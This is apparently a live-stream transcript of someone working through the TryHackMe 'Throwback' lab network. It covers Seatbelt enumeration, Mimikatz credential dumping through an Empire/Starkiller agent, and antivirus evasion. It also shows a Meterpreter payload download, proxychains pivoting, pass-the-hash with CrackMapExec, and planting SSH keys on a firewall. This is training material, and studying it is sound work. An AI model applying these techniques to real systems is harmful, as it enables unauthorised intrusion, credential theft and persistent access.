doesn't see these results, no worries. Give it a little bit more time, I guess. And then we should have the new credentials. Oh, from your testing, yes, okay, I understand. Krillix responded, yes, from our testing, there just has to be some desktop session going on. Realistically, I don't think that's awful. I don't think that's too bad. Maybe on a regular user workstation, there just might be something that's running. There might be someone using the machine. So I don't know. Hey, can you have some results seatbelt? Thanks, man. All right, cool. Now we got something to work with. Hopefully we will find some credentials at this point, but looks like we're getting some ARP table information. I'll zoom in on this more so you can see it. Auto runs, we have a little health sys tray, command is running, cred enum. No, that's supposed to be able to do something, I think. A specified login session does not exist. It may have already been terminated. But why? I'm over here, dude, I'm right here. I'm logged in. It didn't do it. Yep, yeah, I see it. Crap. Well, Krillix, I appreciate you being here with me. I'm really happy to have this sidekick here. You'll need to pull the binary and run it from RDP. That's fine, I'll do it. You've convinced me. Oh, shit, I fucking foreground. I'm sorry. Sorry. I foregrounded, I backgrounded the session of Starkiller and that was probably doing weird things. So let's get our THM throwback. Hosts, moving to prod. Let's copy that ghost pack, ghost down, oh, sorry, it's under opt, ghost pack compiled binaries and we want seat belts over here. So this directory is still in this web server, HTTP server is still running in this current directory so that I should be able to move into the desktop. And then let's do another W get to now get seatbelt. I'll save that as seatbelt.exe and I will download seatbelt, seat, not selt, seatbelt.exe, pull it down, it failed. Seat, no, there is not a capital B in that. Goodness gracious. Seatbelt, gotcha. Okay, now in the RDP session, I should have on my desktop a new seatbelt. Okay, so, can I, oh, okay, damn. We're just gonna open a regular command prompt then if that's not gonna work for me. CMD, thank you, CD desktop. You guys can probably barely see that and I'm very, very sorry. Let me make this faster and hurry up and run this. Seatbelt has all these available commands. Is there a way that I can just run all? Seatbelt has the following command groups. Seatbelt tack group equals all runs all commands. Okay, let me make this bigger, sorry. I think Remna will be able to figure it out. Toggle dynamic resolution update. Yep, okay, and I probably should have invoked PowerShell to make this a little bit more better. PowerShell, and I still can't zoom in at that. So let me just right click it and make the font larger for you. Font, 28, 36, big numbers. CD desktop, is that a little bit easier on your eyes? Whack, okay, so I know that Seatbelt needs to be supplied with that tack group equals all. And now he's doing his thing. Cannot enumerate antivirus still. Now we're looking for AppLocker. Whoa, I just whacked enter to see if it was like stuck on buffering and then it just funneled out. So it's rolling back through here. Now we have ARP table, auto runs found. Credit him, there it is. There it is. Awesome, awesome, that took us a little bit of time, but I think we finally got it. So admin, Peter's J, does not have a password. Should there have been a password there? What was the username found from Seatbelt? Wait, I don't need to know. Since we know that there are saved credentials, oh, oh, it's not just gonna show it to us, is it? From Seatbelt, we can see that there may be a user account that has credentials stored within the credentials manager. We can abuse this to use the saved credentials to run a file with the account privileges. So run as with a saved credentials that user and grabbing their profile, we can run cmd.exe. So admin, Peter's J, him as an admin should be able to do things. No, no password, but you can just run stuff as him. Okay, I will press my I believe button and hope that my PowerShell prompt comes back to me. Why? Oh, you're just still running through Seatbelt, that's why. Run as save cred user equals admin, Peter's J, J, profile and then cmd.exe, whack. Gotcha, we did it, we did it. We got local admin as Peter's J through our learning process. That was fun. Now I can get to the home directory. What is this, test.py and update.ps1 guys? What is that doing here? Admin, Peter's J, DIR, CLS to get into my desktop. DIR, should there have been a flag in there? Am I not the right user still? Should I be able to get into administrator? DIR, yeah, okay, how about desktop? DIR, there he is, there's my root.text. Let's cat that guy out. Type, type, type, type, type. 69 fartlord69, which is literally your name. Glad we got that in the video. You're asking, hey, I'm really bad at PowerShell syntax. What's a good resource to learn the juicy stuff? If you check out under the wire, they have some really great stuff under the wire, not over the wire. That's a relatively important distinction because they showcase a lot more PowerShell stuff. So where do my readme files at? After getting access, we were able to run seatbelt.exe and discover that there were some save credentials. So we were able to run. It was a run as save cred for his save credentials user and it was admin, Peter's J with his profile, CMD.exe and this spawned a local administrator command line. Jackson, this is asking, by the way, are you writing a report for the whole thing? Oh, maybe. I guess I'm not trying to right now. I'm just kind of like taking my notes. Maybe if people are interested in that, I can just put one together, but that requires me to actually finish and complete all this. So I don't know if that's ever actually gonna happen. You could also consider writing in that you had to use, oh yes, thank you, thank you, thank you, thank you. That is a super duper important note. We needed to run seatbelt.exe through a RDP session, download the binary and execute it from a real desktop GUI because for some reason, for some reason the credentials manager in Windows just didn't want to act without a live interactive session. I'm sure someone will be able to fill me in a little bit more on that later, but from there, we could find the root.text password in C users administrator desktop. Awesome, awesome, awesome, awesome. Let's go ahead and slap that into task four. Oh, there's a second user flag that I completely missed. Oh no. Did I lose some of my eight and nine, seven, eight? Oh no. Number seven, what is the root flag on throwback prod? And this guy should actually have a user.text that I want to read. Great, what is that number six? Is there a second user flag in there? What was the hash cat collab program called again? That was a collab cat, collab cat GitHub, kind of walks you through it. And that was very cool. That was very fun. Awesome. Here was there a second user flag that I needed to find? I guess because I'm in PowerShell, I can do a little nice get child item and then like a little recurse and then do a question mark to be like where the name is equal to user.text. So Peter's Jay has one and there's not another one. There's nothing else. Fantastic. Well, because I have root on that box, I could just go see the others. Was it the admin one? I didn't think he had anything at his desktop. I just went there when I was looking. Remina, what do you got for me? Oh geez, sorry. I'm flailing around my desktop as usual. Can I run PowerShell.exe from this command line? Yes, I can. And now let me do a get child item, recurse. Yeah, I see there are a lot of other users. So let's look where name is equal to user.text and see if there's any others. What? Oh, sorry. I should have a string around that. There we go. Okay, Blair has one in his desktop. So let's hop over there. DIR and cat user.text. Great. Okay, that is number six that I want to keep track of. Did I have credentials for him? I forget. Oh, and we had a user flag on throwback ws-01. Shoot, we had root on him. Ubuntu colors on PowerShell is the ultimate bone. Okay, well, let's ignore that later. Hashtump like a boss? Ooh, that's a good idea. Dude, you're totally right. We have an agent that's running and we could just run another one because we have that launcher in place. So, I am currently the admin in this command line shell. But if I run that launcher.bat, did that just die? What the hell? What the hell? Come on. The Starkiller is still gonna get another agent? Yeah, yeah. Okay, does he have life? Give me the goods. Yeah. All right, sweet. Hashtump, is that right? Oh, it closes the terminal agent when it disploys. Okay, cool. Good to know. I'm not running on Linux. I'm not running on OSX. Does Mimikatz just do it with that DC one? Mimikatz, can I do a Mimikatz creds all, please? Just find it. Find the good stuff. Yeah, not desync. I wouldn't think it would be desync. Log on passwords, LSA dump. Okay, that makes sense. Fire away, my friend. Very slick. Very slick. What do you got for me? I don't know if he's just taking his time or what. But we'll let it do its thing. And we will get back to where we were. Actually, that creates a dump file and you need to extract from it. Oh, fantastic. Where does it put that dump file? I shouldn't have done that. CDC users, yeah, where does that dump file go? Eh, let me get back to where I was at. So we ran seatbelt, we got credentials, we submitted that flag and then, oh, we were supposed to do our own password dumping. Great, is there a secure LSA log on password? I can check. Let me read through this real quick. Mimi Katz, yep. Mimi Katz is one of the most famous tools used for dumping passwords on Windows systems. It can be used to dump passwords on both a Windows server and mainstream Windows versions. However, with its fame, its patterns are incredibly recognizable and are almost immediately picked up by all anti-virus or anti-malware services. So you must disable endpoint protection before attempting to use Mimi Katz or utilize an obfuscated version of Mimi Katz with AC2. Mimi Katz has many modules available and is being actively supported and updated. Here's a list of the supported modules, log, privilege, secure LSA, et cetera. We'll only be utilizing four of the modules for the lab privilege token LSA dump and secure LSA. How am I secure LSA? Is that how people pronounce that? Mimi Katz has a lot more modules that can be used a lot more extensively. Once endpoint protection is disabled, you'll then be able to launch Mimi Katz and you'll want to type deep privilege debug, which will put you into debug mode, a mode that can only be granted by administrator. From there, we'll want to elevate privileges to anti-authority if you don't already have it with token elevate. This will grant you the highest level access that Microsoft has to offer, which will allow you to basically do anything you want on the system. It's essentially the root user account in Linux. Okay. So I can do that on the box because I could just download the thing if I wanted to. And because I'm using RDP in this case, should we do it? TLDR, LSAS is the Windows process that does all the security stuff. Its memory has passwords, so you dump its memory and read any stored cache passwords, either hash or clear text. Nice. Yeah, LSA, local securities authority. Nice. Oh, so Curlsah or however you pronounce it, yeah, I got you. Krillix says keep reading the full task or the full thing in the next task before dumping anything. This being the least preferred method for, okay, so Curlsah will do, retrieve the current hashes of any currently logged in users. This is probably the least preferred method of dumping credentials in MemeCats. I follow. Now that we know the commands associated with MemeCats, we can move on to loading the MemeCats module with Starkiller to bypass anti-virus and dump hashes remotely. Nice. And then we got the not the soft and fluffy kind. Okay. Oh boy, a lot of stuff here. From the previous task, we know the command syntax for MemeCats. Now an easy way to get it on the machine is to execute MemeCats command. This can be easily done by getting a MemeCats binary and putting it on the machine. However, this will get picked up almost instantly by pretty much every anti-virus. To make life easier and bypass AV, you can utilize a C2 like Empire to load a MemeCats module and execute commands remotely. We already have a responding agent on throwback, so we can continue to use our agent with elevated privileges. Yep. We brought in that admin one. Starkiller offers 16 different modules for utilizing MemeCats. Most of them are specific to one MemeCats module, such as SoverTickets. Empire also has a module that can run any MemeCats module and command an Empire module for is that thing. We'll be utilizing the command module. However, the other modules have the same functionality. Gotcha. So, then you just specify what you want. Roger. Let's do it. Let's do the thing. We got Starkiller up. Let's go into our modules. We can search for our MemeCats and let's use that command one. Actually, let me just get to the agent, sorry. I wanna specify this one specifically. So, let me search for a module and I'll look for MemeCats once again and command. That does require a command to run and it was privilege colon debug. Was it one colon or two? It was two colons. So, go. Okay. Now he's doing his thing. Let me check out the reporting that we got here. That was just now and it did it. Great. I don't think I have any output yet. Maybe I need to wait. That's fine. That's fine. We could use the CURL sign and log on passwords after that. I'm just gonna do it and see what happens. So, agents on our admin one. Let's search for that. No, oh, oh, oh, okay, got it. So, it did get into privilege mode and now I am NT authority system. Can I verify that? I just wanna see real quick. Does it? Oh. Okay. It might, is it gonna be like in that session? Or, oh no. It told me that I needed to run privilege debug and then token elevate. I wanna do that first. I hope that's cool. MemeCats command and then it's token colon colon elevate. So, do it please. He's doing his thing. Give him a little bit of time. And then we can go on and dump passwords as we talked about. They suggest using CURL sign. Someone please tell me if I'm saying that the wrong way. CURL sign log on passwords. And then, oh, it'll automatically add those. Is that right? It'll automatically put those in the credentials. I don't need to put them in myself. Nice. Okay. We didn't, Krillix is responding in the chat. We didn't add it because it's not needed but it's a good practice to try and elevate with token elevate. So I'm glad I did. Yeah. It did it. Who am I? Let me be system. What? What? Ha ha ha ha ha. Yeah. Whatever. I'm, I'm misunderstood. Am I misunderstanding that? You know what? It's okay. It's all good. It's all good. Maybe cat's command. And let's use the, CURL also log on passwords. Please do that thing. He's gonna go and I will see what domain user might be logged in in the user's hash and NTLM hash. Roger. And then how far left, how much do we have left? Oh boy. I don't know if I wanna go through this whole thing. You know? How long we've been going? Four and a half hours. So we're keeping it real. Appreciate those of you that for some reason stuck with me. All right. We got CURL so here. And I see throwback prod dollar sign. Or what is this? The default app pool is seemingly logged in. That's not a real user. Peter's J is logged in. That's me. Remote interactive. Is there another? Nice. Clear text password for admin peers. Dope. I wanna keep that in the back of my pocket. That's true. That's true. Half of this video has been me trying to run hash cats. I'm failing at that. Where do I wanna stink and put this thing? Need more John live streams, dude. Hopefully we can do a lot more of this. Hopefully, hopefully. We'll see. Admin. Peter's J. Password. What else was there? Who else is online? SSHD. A little virtual user it sounds like. TWM window manager. Is there another user that I should be seeing? Admin Peter's J. Interactive from zero. Admin Peter's J. A lot of output here. Network clear text. Yeah, it's almost one AM. It's actually 1240 my time. There's Blair J still. Is he the one that we're asking for? Blair J? Yeah, we are. We have is NTLM hash. What? Oh, sorry. Users NTLM hash and I need the administrator's hash. Administrator NTLM hash. Nice. Okay, so I could crack those if I wanted to. Yeah. We could do that with some collab cat now that we've got that smarted out. Yo dog, I heard you like proxies. Let's see what this next gimmick is. All right. Let me take a quick breather if that's totally cool for those of you that are for some reason sticking with me. I don't know why or how, but it's good that we got this video still going. So. Oh, did I pass Blair J clear text? What? Thank you for telling me. Nice. Thank you. Thank you. You catch Krillix telling me like, yo dude, you totally missed Blair's plain text password. Blair J clear text. And I should have probably saved some of those hashes other than what I submitted it to try hack me. But let me take a quick breather bio break, you know. Be right back in three to five minutes. Sounds like Microsoft Sam. I've learned so much, but can't do anything myself. That's not true at all. I hope this video was kind of fun. I know we'd going for a long time, but I think there's a bio break. Haven't heard that since Eve online, dude. Let me, yeah, possibly from here on out, the passwords might not be able to be cracked. Just run C matrix. Duh, obviously. Nightwolf, why are you still awake with me, dude? What are we doing? C matrix with a, like, I didn't mean to yell. I didn't mean to laugh so loudly in the microphone. I'm so sorry. Transparent color. I don't know. I do it out, do it for LPC. This should be literally everyone's, this should be every InfoSex streamers be right back. Just a text editor window with C matrix. All right, give me just a few minutes. Thanks, I love you. Yo, hey friends. I don't know how many y'all are still with me. Oh boy. Thanks for coming to hang out, everybody. I mean, it blows my mind, you guys are still here. Thanks for doing this. So, if we're really going in for the long haul here, I know we finished one monster, and it's almost one o'clock in the morning, but you know what's better than that is a second monster if we're gonna keep cranking. Uno momento, please forgive me. Jesus, that's still really loud. I'm sorry, I'm really sorry. Rest in peace, headphone users. Let's, gotta work in an hour so it's fine. I'll stick around. I also work online, so I'm probably gonna be watching during. Sweet. I'm super duper, yeah, still here four hours and two hash cats in. You're all the best, I love you. Thanks, chat. Let's get back at it. Your team has informed you to try the throwback hacks, taking on some proper security practices and are properly segmenting their network resources. Now that you have a couple of footholds on a network, you can utilize them as a proxy server to pivot and access internal resources. So we're gonna do some pivoting. Yeah, I'm chilling over on the other side of the world at 3 p.m. I appreciate it. You guys are having some good time. I got a message from my lady who's at work. I was like, hey, are you still awake? I'm like, yeah, I'm awake. Also seeing some comments on the latest hack the box video, so that's good. Let's check it out. In a good network, often referred to as segmented network, there are certain rules in place preventing users from accessing certain parts of the internal LAN, like the workstation subnet should not be able to access the servers. This can be a headache for pen testers on occasion as most networks are not segmented. These networks are referred to as flat networks. To make segmented networks more like flat networks, there are proxying tools such as proxy chains or shuttle or SSH shuttle, which make it incredibly easy to pivot from one subnet in a LAN to another. Metasploit also offers a proxy server as part of its post-exploitation tool, and we'll cover that below. Okay, so we're gonna use auto route. That's good enough. Yeah. Krillix says, yeah, John, your girlfriend's gonna come home and you're gonna be still streaming on like your fifth monster. I don't know. We got six more hours. We got six more hours until Bake comes home, so hopefully we'll finish this in time, or I'll just bail. But to set up a proxy server, you'll need a metasploit session or a verse shell opener metasploit beforehand. You can easily get a metasploit shell by uploading a payload to the machine and executing it. Yeah, let's do that. Let's do that. We've got a metasploit shell that we put together for Linux one, and that had died, I think. I think, anyway. We had a metasploit and that was a not a shell for, we did it for the phishing. We did it for phishing. So that was running on Quad 4? Is that right, I think? This is my open VPN thing over here, but let's start up MSF console and get ready to run this bad boy one more time. We could probably download this guy. I'll put him in, who am I right now? Am I admin currently? I'm still Peter's Jay. Ooh, I wanna be admin. Ooh, oh, I still have that RDP on the box. Yeah, Rest in Peace Terminator from when it died earlier. Let's make this a black screen so you guys can see a little bit cooler and fancier. And let's use exploit multi-handler or for the sake of time, we'll just use multi-handler with a typo in it so that it fails. And let's set our payload to that Windows and interpreter reverse TCP. We'll set our L host to tone zero, specify the interface, and our L port was Quad 4, I think, right? So I could run this or type an exploit to kickstart that. And I hope he uses exploit. All right, let's stop the, we'll stop the listener so we can run exploit this time. John uses MSF 6, he lives on the edge. Yeah, I don't know. I just like to have things updated, at least metasploit. So let's stop this HTTP server that we have running and let's go bring it into the interpreter folder so I can Python tack mhttp.server this one. And let's grab this IP address, because I know that's mine. And let's hop over to our reverse shell connection where I am running as admin PJs. That's not his name. And we'll CD over to Windows temp now that we should be able to access that. Yeah, okay. And there's my A directory. That's the A file that I wrote earlier, I thought. Sure. Let's power shell it up. Let's power shell. Cool. And let's W get to that HTTP colon slash slash my IP address. Port 8,000, and it's not a shell.exe. And I need to actually save that. Sorry, I'll call it met.exe. And now I should have met.exe present here. So fingers crossed, if I were to open this up on one side and then slam that to another side of my screen, I should be able to run met.exe with a dot slash because I'm in power shell, whack that, and that fails. Did it get nerfed or did I run it on quad four earlier? No, I didn't, because that was the reverse shell. We ran this on quad. We ran this on 4141, didn't we? I think. Who asked me to do that earlier? Set L port 4141, maybe, and we'll use exploit because that's what people wanna see. Okay, hello, interpreter. Great, I guess that's good. Then we could start this on a route. So we'll background this by the way and use that post module multi-manage on a route. So we could check out the sessions that I have. Sessions of an S, looks like session one is where I have that current session, which makes sense. I didn't mean to interact with it, sorry. I do want to just set the session variable or the option for this module to that and we'll set our subnet, is that a thing? Show options, you can set a subnet. What? So set subnet to 10, 200, 24, zero. Right, because I am in 24, in my case, that's my subnet. So that should do it and then I just go, exploit. Okay, great. Now we have that auto routing done and we could start up a socks server. We could do that also with proxy chains. Yeah? Do I have proxy chains installed? I might not on this box. How do you bring the background task back again, sorry? So you might have seen me do it just kind of ad hoc. When I ran sessions, that'll show me all of the active sessions in Metasploit and Metterpreter or like CMD.exe or whatever session you actually have open. So you can do sessions, tack I to interact. And if you take a look at the help sessions with an S plural, tack I will let you be interacting with one of those options. So I don't think FG will do it, will it? No, no, Metasploit's like, what was that? Yep, yeah, we're Metasploit. So sessions, tack I, end of the session number. Gotcha. All right, we need proxy chains. So not a thing. Let's go and install it. So app proxy chains for, looks like the latest version seemingly, thanks Ubuntu. Yeah, for sure. Chat said thanks for that quick demonstration. I realized that I'm still recording a video so I feel like I have to offer context for if for some reason people watch this video after the fact. I don't know who sit through these five hours of me just fumbling around on my keyboard. And then we could set up our proxy. Now we can proxy chains just about everything that we want. How often do I stream? This is very, very new. This is the first time I've ever like streamed on Twitch and this probably does not happen often. I'm trying to get better about making time in the evening for me to do this sort of thing, but it's a toss up, you know, like I have to kind of keep life in mind. So let's use this auxiliary server and then let's show options. See what we got. Anything in this interpreter or in this Metasploit session? Default ports totally fine. Yeah, thanks man. So if you haven't heard of my YouTube channel, it's kind of what I normally do. And auxiliary modules running background job zero starting the socks for a proxy server. Looks like that's good. So let's pseudo, nano, et cetera, proxy chains on our current machine and down at the very, very, very bottom socks for it would be listening on local host, but we need to change that to 1080. So let me just copy that line and move this to 1080. Yeah. Okay. I think that's fine. There's an extra space in there that was tweaking out over. Great. Now I could proxy chains and run commands. So if I were to proxy chains, ping that 10, 224, is it like 219? Yeah. Cool. Now we're cruising and it'll just run. It'll just do it. Pivoting with proxy chains. Pivoting may seem like a very big and scary thing, but it's actually fairly simple after you have your proxy server set up. After setting up the proxy server, you can pivot to any machine or resource that the proxy server has access to. For example, if you had a proxy server on example workstation one and example workstation two, that one machine, that second machine was segmented by a security group, made it so only example one had access to it, you could use your proxy server on example one to access example two. You can use any way of accessing the machine you'd normally use, like SSH, RDP, WinRM, PSExec, you just have to prepend the command with proxy chains and then it'll just do it. Some examples here using SSH or RDP or Evil WinRM. You could also set up a web proxy with Foxy Proxy. Let's add an extension to a web browser. Do I actually have Foxy Proxy set up in here? I actually, I literally have Foxy Proxy. Nice, nice. Click on Foxy Proxy among your extensions. After that, click on options and add. And I already have one for Burp Suite, actually very, very similar to what they have, which is kind of funny. And then let's create socks proxy. So let's do that. I will go into the options tab here and now I'll add a new proxy. It'll be that socks for proxy that we're doing and it'll just go back to my local host because that's where it's running, but port 1080, which is the same one that we've just specified over here, that's gonna be our socks proxy. I can call this like socks for proxy and we'll give it a nice little color for blue, I guess, and then we'll save that. Cool. Now that that's a thing, it should be good. Read the above and set up your proxy. I did it. Great intentions, courtesy of Microsoft. Where do you need to do some crack map exec? I butchered that word, crack map exec. Now that we've enumerated and attacked all the initial vectors, we can begin to collect the credentials that we have as well as what footholds we have on the network to see how we can laterally move through the network. The first thing to do is when we have credentials but don't know what to do with them is to try and pass the hash with them. This checks each IP and validates the credentials. You'll need to practice pashing the hash with the hash you dumped in task 20 as well as the hash from task 10. Okay, so I remember task 10, that was our security center boy and task 20 we found for Blair, I think, or for admin, one of them. So pass the hash is an attack wherein we can leverage found NTLM or landman hashes of user passwords in order to successfully authenticate. This is a huge room, seems realistic though. Yeah, well done. Obviously kudos to Krillix for this incredible thing. I hope I can help shine some light on this throwback room. Even though I didn't do it using SSH tunnel, I would recommend using it on the firewall. Ooh, okay. I will certainly play with it. Yeah, I'd love to be able to kind of jam with that and explore it. This is possible to the well-intentioned security feature within Windows where passwords, prior to being sent over the network, are hash in a predictable manner. Then originally with the intent of avoidance of password disclosure, we can actually leverage this feature to capture and replay hashes, allowing us to authenticate as other victim users. In this section, we'll dig in this further with the tool crack map exec. Yes. It's finally time. Finally time. Okay, man, I really built that up, didn't I? Pretty anti-climactic on that one, huh? Okay, crack map exec. Let's get this thing in, let's get this thing in my Buntu box here. So, let me hop over to my op directory, which I've got and let's get clone byte bleeders. Crap map, crap, crap, how many times? Why would you? The name of this tool is a little bit hard to say. I'm gonna say like, crap, Mac, exact. No hate, like obviously, I think in love, byte leader, that guy's a genius. He's Silent Trinity, right? Can I just install this guy? CME, that's a much better way to say it. Come here. And please see the installation. Cali, exact, debu new Buntu. Python 3 setup install. Wack, I'll probably need to do that as user. Woo, now he's cruising. Cool, cool, cool, cool. We got a lot here. Done, now can I run crack map exec? I can, oh no, what the what? I guess I should probably install everything from the requirements first. It'll do that automatically as user, I think, right? I mean, PIP install should have done that. Why did that fail? How did I run that Python? Was that Python 3 when I ran setup install? There's so much output now, I probably can't tell. I'll wait till I get my command line back and just kinda check through the history. But I don't want that to just crash when it tries to run. Did I use PIP 3 or PIP? I just ran that with PIP 3, so yeah. I mean, you're right. I mean, that's a good call. You're just thinking the same thing. Like, oh gosh, more Python versioning crap. Crap map exec. So with proxy chains, we can run crap map crap. We can run crack CME and try to use SMB. What does that do? Does that just tell it like, I ran Python originally itself. So not, and that puts me at 3.8. Crack map exec. No. What is this? Pardon, like I could pseudo install, but that'd just be, you know what? Okay, fine. We'll see if this helps or just makes things worse. Probably the latter. It's usually the latter. Sorry, I was trying to move the microphone down. I realized I made some more stupid noises. I was still learning how to stream, guys. Funny just talking to myself like alone in this room, but hanging out with you guys. It's kind of a weird feeling. All right, crack map exec. Still dies. Let me pseudo that with the requirements and see if that destroys anything else. We will work. We will get this right. I know we will. Yeah. Reminds me of getting frustrated and trying to install just about anything sometimes. Doing fine, boo. I appreciate that. Thanks, chat. Anyway, I wanted to learn about what it's doing when it uses that SMB move. Is there docs? Is there documentation? Yeah. Heavy use of impact it. Still going. And this is the documentation. Okay. So, selecting and using a protocol. I'm assuming that's where I can learn a little bit more about SMB. To use a specific protocol, run CME in a protocol. Will CME just be the command that I need to run? Yeah, that's still dies. Crack map exec. Maybe I need to just install this with explicitly Python three and then not with pseudo again. Install tech user. Map exec. Sudo. Oh no. Man. I have a text message. Sorry. She says, you've been streaming for four hours? So yeah, this is weird. I know this is not normal. I think you can try force reinstall. Says the chat. Force reinstall. Is that right? Or do you mean it would like with pip? Yeah, five hours and eight minutes. Good Lord. Looks like a thing for pip. Is there a crack map exec like Docker thing? We spent so much time wasting our time trying to learn and get a hash cat working. Now we've hit our next wall of getting crack map exec going. Reinstall it all over again. Crack map exec. Docker. Is there a Docker? Oh, yeah. It's just, it's just Docker. Okay, it's just on Docker. It's just on Docker. Roger that. Can I just kind of like run that? Whoa, no. There goes Terminator again. We were doing so well. What's going on with my proxy now? Is the proxy server just gone? F. F proxy chains. Ping. It's doing it. I think, I think it's doing it. Krillinx, don't blame me for this. Krillinx is like, damn it, John. What did I do? Docker run this. This is, I was reaching for the monsters. This is the empty can. Go back to my text message. Which is, you've been streaming for four hours. Yep. Are you actively streaming? Yeah, yeah, I'm actively streaming right now. It does it. Incredible. Docker is a thing. Have I taken a break yet? I mean, yeah, I've taken a break. I mean, it was just a couple of minutes. My bio break, as you guys were giving me flak for saying. So what do we got? We're gonna run SMB, that protocol. And I was reading about what it did. SMB. And then it's just gonna try and access or authenticate to different things with this. Five hour stream, two hours of hash cut on XPS. An hour and a half of hours recovering from terminated crashes. Look at the usage line. Oh yeah. Oh yeah. On this page it's like, boom, this is everything you can do. Let's see what we got. We need to know a user though, don't we? I mean, oh, oh, I understand. Okay, so as a user that we know, we could see where we can access it with this pass the hash technique. So if I run this, can I specify SMB 2224 slash zero slash 24 with the user of the hashes that I totally should have saved? God dang it. Yeah, if it's referred to as CME, I'll repeat it, I'll start saying CME. Okay, I need to get these credentials back. I totally should have saved these. Administrator is NTLM hash. Administrator, NTLM hash, this guy. And Blair J's hash was here, right? I think, yeah, I think let's use Blair J the domain of throwback and then the hash should be that hash. Does it do it? Will it do it? It looks like it's running. Should I be doing this with the administrator one though? Oh, I probably need to proxy change this. Shoot, can I do that with a Docker container? Is that gonna be weird? Oh, no, yeah, you're right. I know, I need the proxy. Can I do that? Okay, it just does it, I guess. Thank you, Krillix. Should I be like seeing output though? Like, should it be trying to tell me what it's doing? First time use detected. You're gonna see that every single time, but you're trapped in a Docker container. My reaction is priceless. I'm glad, I'm happy that I can at least try and keep you guys entertained doing this. Doing all this nonsense. Can I get a sanity check? Should I be seeing output? To continue on, you can either use a hash this for me, let me catch the crack. Oh, thank you. Thank you, chat. No, you're right. Did I bind the ports in Docker run in my proxy? Gosh, using this thing through Docker is just gonna suck. Why the heck won't it install? Thank you, Emishari. I appreciate all the kind words. Yeah, yeah, man, absolutely. It's fun for me too. Let's get back to crack map CME. Let's get back to CME and try to install it properly. Yeah, I mean, I guess I can just use the 1080, but attack P, 1080, 1080? Will that know how to do it? I'll just let that go. Oh, oh shoot, wait. Oh, I should put the, sorry, you probably can't see that. I should put the attack P after the image name or before the image name, sorry, with Docker run. And I'll just press the I believe button, try giving it the IP address of a known host to make it easier instead of scanning the whole network. Can I just like just do a sanity check? Be like, hey, yo, find this on 219. But that should see it. Like that should get a result, I think, because the, okay. 10, 224, 219. Did you die on me again? Did the network just give up on me again? Is that why it failed? Is that why I was not getting any output? The solution, the answer, the problem is that I suck. Oh, okay. You know, at least we have learned that apparently Terminator crashes and it just can't, when the network gives up, it's so funny. Okay. Do I have, okay, good. I was worried, I was a little worried. I was like, am I not connected? What happened? Someone said a timer for John. Oh, yeah. Please, dear God, proxy chains work with a machine that actually responds. That got a hit. I don't understand. Does this, that output means that it got something, right? It looked like you're not stuck in your Docker container. Now, okay, thank you. I appreciate the chat. The chat's helped me like, look, now that we've got our sanity check, let's go for the whole network and see what we can whack. Let's see if we get any output, any sane output with proxy chains, or if it's just gonna like chill my terminal. You know when your like terminal cursor stops blinking and you're like terrified, like, what happened? Why did you stop? Are you still alive? And then if you like whack enter and your terminal does nothing, you're like, no, not now. It's gonna take a long time. Oh no. I wanna at least see output from proxy chains. Do I need like attack V? I think proxy chains like can specify its verbosity, right? Thanks for everybody helping me learn. Oh, proxy chains not being, yeah, that's the thing. Like proxy chains should be verbose, right? I can amp him up, can I not? There's a setting, like there's a proxy chains. Yeah, yeah, okay. Chat's saying like, dude, you really gotta try SA shuttle. Let me do it. Verbose, verbose, verbose. There's gotta be, oh, okay, I just closed that tab like an idiot, so. There's gotta be a thing. Isn't there a debug? I think there's literally a proxy chains like debug output. I think it's, yeah, it's verbose by default. It's supposed to be. Yeah, yeah, yeah, you're right. Okay, here we go. SA shuttle, shuttle, shuttle. I just typed in not the right word. Is it like tack-dack verbose? I don't know. Let's get shuttle going on. Is that a, it might be in the repositories. Let's go for shuttle. If we go for shuttle, doesn't that mean, no, I don't find pocket useful whatsoever. I haven't turned it off, I'm not Firefox. I literally, it probably just shows like, it's stupid, bad, inappropriate things. If we have shuttle, we should get back on the, yeah, well that actually installed properly. Incredible, so. At some point you're going into proxy chains, but for now shuttle will only work on the firewall. Yeah, I was about to say, we got to get back on that firewall. So I need that shell back. And I didn't do anything to like, give myself persistence on that. So let's redo all of the work that we did earlier. Admin, PF sense. At least I remember this. At least I know how to do this now. Famous last words. Opt, PMP, Necat, reverse shell. It's this command that I need to massage. Just a quick second. Can I just SSH in the firewall? Do I know a regular user on the firewall? I'm trying to remember. I thought I just, it was just root. It was just root on that I think. Does there admin? Why does your cat look fancy? I'm using bat, which is a nice little shell extension. Can I SSH into that? As those admin credentials, is it that easy? Part of me feels like it's not. Let me find out. No, what? I can't SSH into that whatsoever, apparently. Necat LNVP quad four. Oh, I entered the wrong IP address. I need my IP address. So, IP, hey, terminal, get out of here. IPAS ton zero. I should really remember this. 50, 22, five. Whack. Can I add a user? Yeah, that's fine, dude. Yeah, that's fine. That's fine. Yeah, use password-based authentication. No, don't use an empty password. No, don't use a random password. Give me any password. Literally anything. No, yes. No. Okay, can I SSH as John into that firewall now? Oh, hello. No, it needs a public key. So, sorry, home, John. Make directory.ssh. And let's do, let's get into CTF try hack me, CD throwback, hosts, foo, and SSH key, Jen, just to make a stupid poopy SSH key. Slap that by a boy, add in idrsa.pub, and let's use an actual bincat for that so I can copy that real, real easy. Great. And now let's cd.ssh and let's echo, crap, that into authorized keys. Okay, now can I SSH tack idrsa into John at that IP address? That's not an IP address. That is very far from an IP address. What's that? That guy, please, please? Yeah, okay, fantastic. Now let's make bash set UID. Oh, I don't have bash, crap. CD, et cetera. Do I have a sudoers file? Cat sudoers, no. Come on. CD root, cd.sh. Oh, he has authorized keys. Nice, let's cat homejohn.ssh idrsa and add it into our authorized keys. Excuse me? Oh, crap, homejohnssh authorized keys. Oh, thanks so much, boop, boop, I really appreciate that. I was just adding myself some keys. So I would hopefully be able to get back into this box when I inevitably break it as I apparently tend to do. That should work now. So now can I SSH to straight as root, please? Why? Can I specify user mod or anything? You know what, it literally doesn't matter. I mean, it does matter, but I'm just trying to figure this out. Yeah, I put the key in John's user. Try removing tacI, did I? No, I'm in roots.ssh authorized keys. So when I added, sorry, cat authorized keys, root should have a John idrsa public key there. Looks like I just can't SSH as root. There is a PF sense setting to disable root login over SSH. That makes sense, you know? That probably is as expected. SSH server, enable secure shell. Is there a root setting anywhere? Probably not. That's fine. You know what, I don't need to waste this time, I guess. We should do some actual SSH stuff or actual shuttle stuff, but I really, really just like this. How can I, open BSD, add sudoer? Can I like make his user ID zero? Is that, well, not still work, but I know he has like obviously, obviously there's another root user that already has ID zero. So I probably just can't take that, but go to system user manager, is that right? System user manager, admin, groups, settings. These are just for, if you try SSH, it may work because you're identifying by your publicly not the private key. I don't understand what you mean. Yeah, I don't understand how that would work if we aren't supplying the 